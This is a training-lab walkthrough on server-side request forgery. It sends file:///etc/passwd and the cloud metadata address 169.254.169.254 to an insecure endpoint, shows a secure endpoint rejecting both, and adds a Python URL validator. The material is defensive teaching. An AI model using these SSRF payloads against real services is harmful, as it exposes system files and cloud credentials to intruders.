- Step 1: Open a terminal and change to the lab directory
cd /root/ssrf-urllib
- Step 2: Build the Docker image and run the container
docker build -t app .
docker run -p 5000:5000 -it app
- Step 1: Attack the insecure endpoint to see if you can read sensitive internal files
http GET http://localhost:5000/insecure/optimize url=file:///etc/passwd | jq -r '.data.raw_data' | base64 --decode
You should see the /etc/passwd entries dumped in plain text.
- Step 2: Attack the insecure endpoint to see if you can read sensitive internal URLs
http GET http://localhost:5000/insecure/optimize url=http://169.254.169.254 | jq -r '.data.raw_data' | base64 --decode
You should see the API return a successful response here as well.
- Step 1: Attack the secure endpoint to see if you can read sensitive internal files
http GET http://localhost:5000/secure/optimize url=file:///etc/passwd
You should see the response "Invalid URL".
- Step 2: Attack the secure endpoint to see if you can read sensitive internal URLs
http GET http://localhost:5000/secure/optimize url=http://169.254.169.254
You should see the response "Invalid URL".
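
One way a check like the secure endpoint's "Invalid URL" response could be implemented, as an added example that is not the lab's own code. The names `check_url`, `resolve` and the `resolver` parameter are hypothetical, and the lab's actual validation may differ.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the service only needs web URLs


def resolve(host):
    """Default resolver: every address the host name maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_url(url, resolver=resolve):
    """Return (allowed, message); reject anything that is not a public http(s) URL."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False, "Invalid URL"
    # Scheme allowlist: blocks file:///etc/passwd and other non-web schemes.
    if parts.scheme not in ALLOWED_SCHEMES or not host:
        return False, "Invalid URL"
    try:
        addresses = resolver(host)
    except OSError:
        return False, "Invalid URL"
    if not addresses:
        return False, "Invalid URL"
    # Check every resolved address, not the host string, so alternative
    # spellings and DNS names that point inward are caught as well.
    for addr in addresses:
        try:
            ip = ipaddress.ip_address(addr.split("%")[0])  # drop IPv6 zone id
        except ValueError:
            return False, "Invalid URL"
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped
        # is_global is False for loopback, RFC 1918 and link-local
        # ranges, which include 169.254.169.254.
        if not ip.is_global:
            return False, "Invalid URL"
    return True, "OK"
```

The fetch that follows has to connect to one of the addresses that passed the check and re-run the check on every redirect; otherwise a second DNS lookup or a redirect can still lead to an internal address.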